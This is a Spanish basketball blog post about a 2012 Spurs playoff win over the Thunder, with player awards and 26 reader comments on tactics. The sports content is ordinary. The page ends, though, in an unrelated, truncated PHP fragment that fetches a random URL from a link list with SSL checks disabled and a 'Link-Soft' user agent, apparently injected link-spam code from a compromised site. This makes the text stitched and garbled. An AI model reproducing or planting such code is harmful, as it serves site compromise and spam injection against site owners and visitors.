La Crónica: Spurs Globetrotters

30 de May de 2012 por TheDeerHunter

Se nos empiezan a acabar los calificativos respecto al “pasote” ofensivo que nos están ofreciendo los Spurs. 30 puntos por cuarto, 55% de acierto, 27 asistencias, 11 de 26 triples… La duodécima victoria consecutiva es para verla y paladearla. La cantidad de jugadas diferentes que pueden implementarse con tanta gente enchufada, la velocidad con que la bola se desplaza frustrando a los magníficos defensores Thunder…

Ni Paul, ni Westbrook, ni Rondo… el base del momento es Tony Parker. El francés está cuajando el mejor baloncesto de su carrera y eso es decir mucho. Ayer Westbrook estuvo sobresaliente pero palidece al lado de su rival: 34 puntos con sólo 5 fallos y 8 asistencias con 2 pérdidas. Pero lo mejor es cómo movió al equipo y cómo se movió el equipo alrededor suyo, y ese es un aspecto donde no hay comparación posible entre ambos bases.

Ginóbili no estuvo tan increíble como el choque anterior y Duncan fue el peor de los suyos de cara al aro. Sin embargo, el viejo Tim lo compensó con nada menos que 12 rebotes, 4 tapones y 6 asistencias y el resto dio un paso adelante con una extraordinaria aportación de Leonard, Diaw, Green y Splitter. Por poner un pero, podrían haber estado algo mejor en los tiros libres.

Lo mejor que puede decirse de los Thunder es que aguantaron enteros el huracán. A cualquier otro equipo le habría caído un palizón de 30 puntos, pero ellos se mantuvieron firmes en los 10 de desventaja y amenazando en todo momento el resultado. La actuación de Durant, Westbrook y Harden fue estratosférica, pero contra los Spurs su intendencia se está mostrando insuficiente.

Por cierto, Fisher alcanza a Kobe en la tercer puesto histórico de partidos disputados en postemporada, a 17 de Jabbar y a 24 de Horry. No lo hizo mal anoche el pescador.

PREMIOS

MVP: Partido prácticamente perfecto de Tony Parker. 34 puntos con un 16 de 21 en tiros de campo y 8 asistencias. Se comió a todos los que se le pusieron delante.

Rookie: 18 puntos (7 de 12), 10 rebotes, 2 tapones. Los números de Kawhi Leonard no parecen los de un rookie.

Sorpresa: Boris Diaw 9 puntos, Danny Green 10, Tiago Splitter 9… ¡Intendencia!

Decepción: ¿Se puede ganar una final de conferencia con solo 6 jugadores? Viendo el nivel de Sefolosha, Mohameed, Collison y Cook parece que los Thunder se verán obligados a intentarlo.

Esfuerzo en vano: 88 puntos entre Kevin Durant, Russell Westbrook y James Harden pero ni por esas.

Imágenes | AP Photos / Getty Images

Comenta

26 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    120 han hecho estos animalicos en un día discretísimo de Duncan en la anotación. Vale que cada partido es una historia en Playoffs, pero es que no veo la manera de tumbar a este equipo.

      Citar

  2. GreenPride dice:
    #2

    Increíble, fantástico, fenomenal… el título de esta crónica me parece de lo más acertado. ¡Que exhibición de los Spurs! Un equipo que juega como tal en el que absolutamente todos suman sin miedo a tirar y sobre todo con capacidad para pasar, sin egoísmos, compartiendo el balón y las responsabilidades. Partidazo de principio a fin de los Spurs que a día de hoy parecen realmente imbatibles jugando a este nivel…. y eso que Duncan ha hecho dos partidos flojitos en ataque con muy malos porcentajes. En realidad el bueno de Tim es al único al que los Thunder están consiguiendo defender aunque está aportando en rebotes, asistencias y sobre todo en defensa (impresionante cómo defiende el aro sin hacer personales) y haciendo grandes bloqueos.
    El principal problema de los Thunder es que no están pudiendo con el juego a partir del Pick&Roll iniciado por Manudo o Parker. En cuanto dejan atrás a su defensor tiran para dentro y ahí o se la juegan con su rapidez o aprovechan las ayudas para iniciar los pases al hombre libre y ya traer de cabeza a toda la defensa de los Thunder.
    Decir que los Thunder en mi opinión jugaron realmente bien este partido y lo intentaron todo, hasta el hack a Splitter (¿Cuando se le olvidó cómo tirar los libres?). Sus tres espadas muy enchufados en ataque, gran partido de los 3, el problema es que si metiendo entre los 3 casi 90 puntos no ganas está claro que tienes un problema (parece que sólo Fisher está a la altura). Su problema principal es cómo defender el ataque Spur y también cómo intentar que otros que no sean estos 3 puedan sumar en ataque. Aún así mantuvieron el tipo como pudieron y siempre dieron la impresión hasta el final de que si los Spurs se relajaban se meterían de lleno en el partido. Esta vez el Harden-Ginobilli estuvo igualado o incluso con ligera ventaja Harden (los 2 hicieron partidazos en realidad) y fue la intendencia la que decidió unido a un fenomenal Tony Parker que volvió loca a la defensa Thunder.
    Creo que los Thunder deben olvidarse de jugar con 2 interiores ya que con la velocidad de pase y la movilidad que tienen los Spurs les sacan demasiadas ventajas a partir del pick&roll. Necesitan gente que se mueva muy rápido y que pueda cambiar de marca tras el bloqueo y quedarse con Parker o Ginobilli y ahí creo que el quinteto que medio-remontó en el último cuarto puede ser su mejor baza con Durant jugando de 4 y algún interior con buenas piernas (Ibaka o Collison). Sería renunciar a Perkins pero creo que es su única opción.
    Ahora la serie se traslada a Oklahoma con la sensación de que los Spurs son casi invencibles. Sin embargo, aún no está todo el pescado vendido. En casa OKC debe apretar los dientes en defensa e intentar sacar a los Spurs de su ritmo de muchos puntos e intenar remontar. En ataque, cómo les vendría alguien por dentro que pudiera aprovechar los espacios que crean sus 3 figuras pero como no lo tienen pues yo jugaría quitando uno de ellos y poniendo un tirador (Fisher, Cook) que pueda crear más espacios para atacar a los grandes y así aprovechar las ventajas que saque sobre todo Durant del marcaje que le tendría que hacer el 4 rival u obligar a Pop a jugar con 4 “pequeños”. Espero como aficionado al basket que lo consigan y que la serie se alargue

      Citar

  3. TheDeerHunter dice:
    #3

    Pop ya les ha destrozado con 4 pequeños: Parker-Neal-Manudo-Jackson-Duncan
    Lo mejor es que encima tienen alternativas tácticas para parar un carro.

      Citar

  4. Vader dice:
    #4

    Estos Spurs huelen a campeones y aunque antes no me caian bien por su estilo tacañon con los Bowen y cia ahora juegan a otra cosa y Popovich hasta se parece al tio Phil, me gustaria que fueran campeones. Han dosificado fuerzas muy bien y han fichado y traspasado como nadie.

    Y los Thunder si no es este año puede ser losndos siguientes porque son un equipazo.

    Saludos

      Citar

  5. MagicJohnson32 dice:
    #5

    Y R.C. Buford sin un solo premio de Executive of the Year…

      Citar

  6. GreenPride dice:
    #6

    Que razón tienes Magic, parece increíble que no se lo hayan dado… y varias veces además. Es lo que tiene ser un mercado pequeño como San Antonio, incluso este año con el temporadón que han hecho apenas se ha hablado de ellos.
    Sinceramente por lo visto hasta ahora yo también les veo campeones

      Citar

  7. Nacho dice:
    #7

    Oh la là!
    Master Class
    ¡Manudona!
    Lo podemos llamar como queramos. Coincido en algo con GreenPride, OKC jugó a buen nivel, y aún así, están lejos de estos Spurs. No es que ya sean candidatos, es que no parece que nadie pueda ganarles un partido.
    No coincido en que Westbrook hiciera buen partido. Buenos números sí, pero buen partido, como que no. Sus momentos de yo me lo guiso yo me lo como está mal vistos y mal ejecutados. En el par de momentos que pudieron los Thunder dar caza a San Antonio tomó siempre decisiones individualistas, mal ejecutadas y con peor resulltado. Si me sorprendió contra Lakers (no esperaba esas actuaciones) me está devolviendo a lo que pensaba de él; buen jugador, anotador, pero sin cabeza. No sabe leer los partidos.
    Por otro lado ¿les falta a alguien por dentro, o simplemente pasan ellos de lo que tienen? Seguramente algo de las dos cosas, pero me inclino a que más la segunda.
    Ibaka por su parte se ha demostrado como buen defensor, no sólo buen taponador. En la remontada final estuvo sólido en las ayudas, cosa que no se vio en Perkins el otro día. ¿Que hiciste, Scott?
    Esperemos que con su público puedan hacer algo, pero estos tipos de El Álamo son la leche. Todos. ¡Qué gozada verlos jugar!

      Citar

  8. HisRoyalAirness dice:
    #8

    Y no comentáis nada del “Hack-a-Splitter”?? Vaya táctica más rastrera pero dio sus frutos, sólo que no los suficientes.

    Sancho, me acordé de ti en el ùltimo cuarto, que Harden hace un 2+1 y Steve Kerr dice que sin pasos y le contesta Reggie “esto es la NBA”. Creo que ese tipo de pasos en los que se saca tanta ventaja son intolerables

      Citar

  9. GreenPride dice:
    #9

    El Hack a Splitter es una táctica rastrera pero San Antonio no puede decir nada pues Popovich es prácticamente su inventor e incluso la usó en la eliminatoria anterior haciendo Hack-a-DeAndre…. Dicho lo cual me parece una táctica anti-deportiva y que merecería una revisión de la regla para que se den 2 tiros libres más posesión

      Citar

  10. Esteban dice:
    #10

    no hay comparacion entre estos dos equipos, por un lado un juego coral que despierta admiracion, 10 jugadores de rotacion espectacular, parker, duncan, ginobili, jackson capaces de irse por sobre los 20, diaw splitter, green y neal, y hasta bonner y blair si tuvieran minutos (no hay tiempo para todos) capaces de irse por sobre los 10

    enfrente, bue que decir, 2 jugadores capaces de irse por sobre los 40 y uno como harden capaz de irse hasta los 30, quien sigue en la lista ofensiva? FISHER!!!! madre, es la cuarta arma ofensiva del equipo, el thunder es mas big 3 que los propios heat

    de ahi que los partidos no sean un paseo, aunque por momentos lo son, por q

      Citar

  11. Esteban dice:
    #11

    no hay comparacion entre estos dos equipos, por un lado un juego coral que despierta admiracion, 10 jugadores de rotacion espectacular, parker es capaz de irse hasta los 30 y duncan y ginobili capaces de irse por sobre los 20, diaw splitter, leonard, jackson, green y neal, y hasta bonner y blair si tuvieran minutos (no hay tiempo para todos) capaces de irse por sobre los 10

    enfrente, bue que decir, 2 jugadores capaces de irse por sobre los 40 y uno como harden capaz de irse hasta los 30, quien sigue en la lista ofensiva? FISHER!!!! madre, es la cuarta arma ofensiva del equipo, el thunder es mas big 3 que los propios heat

    de ahi que los partidos no sean un paseo, aunque por momentos lo son, por que por mas que san antonio saque 20, al otro lado durant anotaba a distancia sin taputos o seguis corriendo el contragolpe, o westbrook seguia filtrandose en la llave y anotando bandejas magicas, o harden metia

    pero la diferencia esta en el estilo de juego, belleza colectiva vs talento individual, el colectivo supera lo individual por el momento, pero los 3 grandes del thunder son tan buenos que aun asi han llegado a finales medianamente cerrado frente a un equipo colectivamente superior en un 10 a 1

      Citar

  12. Esteban dice:
    #12

    sobre lo que hablamos de ibaka el otro dia, es un jugadorazo, comete errores pero es joven, ayer le pitaron 3 tapones ilegales, pero defendio bien, sus numeros parecerian buenos 10 y 9, pero 3 de 11 en cancha
    es un jugador limitado ofensivamente, pero el problema es que su compañero interno es aun mas limitado

    con tan pocas variantes y puntos en la pintura, con popovich enfrente este se hace un festin dejando anotar a los perimetrales, pues son todas jugadas forzadas que no logran hacer entrar en ritmo al thunder y siempre lo llevan por debajo en el marcador

      Citar

  13. Ru dice:
    #13

    THIS IS THE OLD SCHOOL BASKETBALL!!!

    Vaya circulación de balón de los Spurs,antológico ver como llegaba el balón a las esquinas en pases extras,como encontraban al compañero doblado en 2 vs 1…han jugado como han querido y aún así los Thunder estuvieron ahí,y como dice Deer,otro equipo se hubiera llevado una pana bonita,pero estos lo bueno que tienen es que no tienen sentimientos y siguen jugando a lo mismo todo el tiempo,estén tristes o felices,son como el T-1000 de las pelis de Terminator pero ay mamá,ahí está el viejales “Spurszenegger”,esa mezcla de pasado y futuro,jajaja.

    Los Thunder algún día ganarán el anillo pero no parece que sea el momento.¿Soluciones para Oklahoma?No sé si saben jugar de otra manera,¿bajarles el ritmo a los Spurs?no sé si Westbrook está capacitado para ello sin que eso perjudique a su equipo y además Popovich hace que su equipo juegue de cualquier manera.

      Citar

  14. Esteban dice:
    #14

    la unica solucion para el thunder, es darle la anmistia a perkins y fichar por esos 7 millones a kaman, con eso solo, ya tendrian una ofensiva mucho mas fluida

      Citar

  15. MagicJohnson32 dice:
    #15

    A ver, que los Thunder hicieron 111 puntos, que son muchos. El problema no es en ataque. El problema es que están jugando contra el equipo que mejor ataca.

      Citar

  16. rumbero dice:
    #16

    Lo más fascinante es que este núcleo, con el mismo entrenador, ganó su último anillo jugando a 80 y pico puntos y ahora son capaces de meter este ritmo de partido y jugar a más de 100 siempre. Se han ganado que borre esa antipatía que les tenía con este juego de un pase más. Lo de Parker ha rozado la excelencia y, pasarán los años, pero cuando hay que dar la cara hay está Ginobili el primero de la fila. Geniales
    A ver como responden los Thunder en su casa, porque como bien comentáis, aun con esa oleada de juego de los Spurs han aguantado lo que han podido. Si no igualan con un 2-2 lo van a tener muy muy dificil.

      Citar

  17. tebias dice:
    #17

    Los últimos minutos del segundo cuarto y los primeros del tercer cuarto Parker era simplemente imparable…lo metía todo!!!

      Citar

  18. nba dice:
    #18

    Buss, Kupchak y cia deben estar padeciendo “sudores” fríos viendo esta serie.
    Si los Spurs en una temporada de Lockout son capaces de jugar asi, ni me quiero imaginar lo que pueden hacer en una temporada normal, lo de Thunder también tiene mucho merito porque a pesar de la oleada ofensiva que estan recibiendo, no bajan los brazos.
    Y eso que Splitter todavía no ha despegado, yo espero mas de el ., madre mia que miedo dan.

      Citar

  19. Tobal dice:
    #19

    Estos Spurs están imparables,esta temporada juegan a un ritmo de juego tremendo,que terminan arrasando al rival,yo lo siento por los Thunder,pero quiero que gane San Antonio Spurs,tanto esta eliminatoria como la final de la NBA,se lo merecen por ese juego ofensivo y eficaz.

      Citar

  20. Nacho dice:
    #20

    nba:
    Buss, Kupchak y cia deben estar padeciendo “sudores” fríos viendo esta serie.
    Si los Spurs en una temporada de Lockout son capaces de jugar asi, ni me quiero imaginar lo que pueden hacer en una temporada normal, lo de Thunder también tiene mucho merito porque a pesar de la oleada ofensiva que estan recibiendo, no bajan los brazos.
    Y eso que Splitter todavía no ha despegado, yo espero mas de el ., madre mia que miedo dan.

    Por partes.
    Molan mogollón estos Spurs. Disfruto como un enano viéndolos jugar, pero hay equipos contra los que no desplegarían ese caudal de juego, y creo que los Lakers son uno de ellos. Es más, desde el sofá de su casa pienso que ellos iban con los Thunder. Y esto no quiere decir que los amarillos sean mejor equipo que OKC.

    Splitter no ha terminado de despegar, pero ha empezado. Sus minutos del primer partido fueron gloriosos. Creo que, con las diferencias obvias, tiene el síndrome Pau, un poco de Softplitter, y que también tiene que ser duro poner sus huevos en la misma mesa que Tim, Manudo y Parker, y estando en el otro extremo Popovich.
    Aunque también sabemos los que lo hemos visto jugar aquí que tiene potencial para ser AllStar.

      Citar

  21. rumbero dice:
    #21

    Nacho: Por partes.Molan mogollón estos Spurs. Disfruto como un enano viéndolos jugar, pero hay equipos contra los que no desplegarían ese caudal de juego, y creo que los Lakers son uno de ellos.

    Pues yo creo que estos Lakers hubieran sufrido errores. En los cruces contra Denver y Oklahoma les costó la vida frenar su caudal ofensivo, y vale que estos Spurs no atacan igual, pero al nivel que estan, y al nivel al que estan/estaban los Lakers,me da que se hubieran seguido llevando más de 100 puntos por partido. Nose, es una impresión sobre un hipotético cruce que carece de ningun tipo de rigor 😀
    A los que si veo complicándoles el tema es a Miami con esa defensa agresiva de perimétro.

      Citar

  22. Sancho88 dice:
    #22

    Pues yo voy a romper una lanza a favor de los Thunder. Y, además, creo que Brooks debería estar contento, porque creo que ha dado con la poción mágica que no esperaba. Hoy es la euforia del juego como perfección. Nada que objetar. Pero Thunder ya sabe qué tiene que hacer. 2 CONTRA 1 a Parker e Ibaka sobre Duncan a 4 metros o más de canasta. Ahí está la clave. Dureza, ayudas, defensas mixtas y volver loco a Parker. En esos momentos, Spurs no puede mover la bola y la única solución es pasársela dentro a Duncan, que físicamente no puede ni de coña con Ibaka. Señores, la serie va a ser muy muy larga… ya lo verán. El tercer partido va a ser muy diferente a lo que hemos visto en el Álamo. Que nadie dé por muertos a los Thunder porque me parece que han encontrado la solución. Luego te pueden volver a untar, pero al menos tienes armas para pararles. Esa es mi opinión

      Citar

  23. MagicJohnson32 dice:
    #23

    Precisamente el 2×1 a Parker me parece un suicidio defensivo. Primero, porque Parker es un driblador rapidísimo y se pasa los 2×1 por el forro; segundo, porque ante un equipo pasador y que ejecuta el “corner three” como estos Spurs, hacerles el 2×1 es una invitación a que te zurren.

      Citar

  24. HisRoyalAirness dice:
    #24

    Sancho el 2 contra 1 ya se le hizo y tuvieron que dejarlo porque era balon doblado y canasta continuamente.

    Ojito a la que les está preparando Rondo a los Heat

      Citar

  25. GreenPride dice:
    #25

    Primero veo difícil el 2×1 contra Parker, lo intentaron pero la suelta rápido y los Spurs ya te marean a partir de ese primer pase que descoloca la defensa. Puede ser una serie larga si los Thunder consiguen parar algo el ataque spur.
    Segundo, ¿Los Lakers mejor que los Thunder contra los Spurs? Ni de coña. Parece mentira que todavía haya quién crea en estos Lakers después de la serie contra los Thunder. Los Spurs son demasiado buenos en ataque para la defensa de LA, demasiado rápidos. A Parker los Lakers ni le hubieran visto. De hecho sólo hay que repasar los videos de los 2 últimos partidos de la regular entre Lakers y Spurs para tener una idea de lo que hubiera pasado en una serie entre ellos. Si los Thunder no pueden hacer nada contra los Spurs, quizás sólo Miami con su rapidez y calidad atlética pueda. Ya lo veremos si al final se enfrentan en las finales como todo parece indicar.
    Tercero, partidazo Heat-Celtics. Increíble el partidazo de Rondo y al final tras un enorme esfuerzo a Boston no le ha llegado para robar la ventaja campo. Lo comentaremos luego en su post pero una falta no pitada de Wade a Rondo en la prórroga puede haber sido decisiva.

      Citar

  26. nba dice:
    #26

    Opino lo mismo que Green , a los Lakers estos Spurs , moviendo el balon como hacen ahora hubiesen ganado de 20 minimo , y hubiesen arrollado con un 4-0.
    Thunder esta aplicando el 2×1 como contra Lakers,pero ya esta viendo que a diferencia de Lakers, que ni Bynum ni Bryant eran capaces de doblar el balon, estos Spurs de tejan en bragas siempre.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>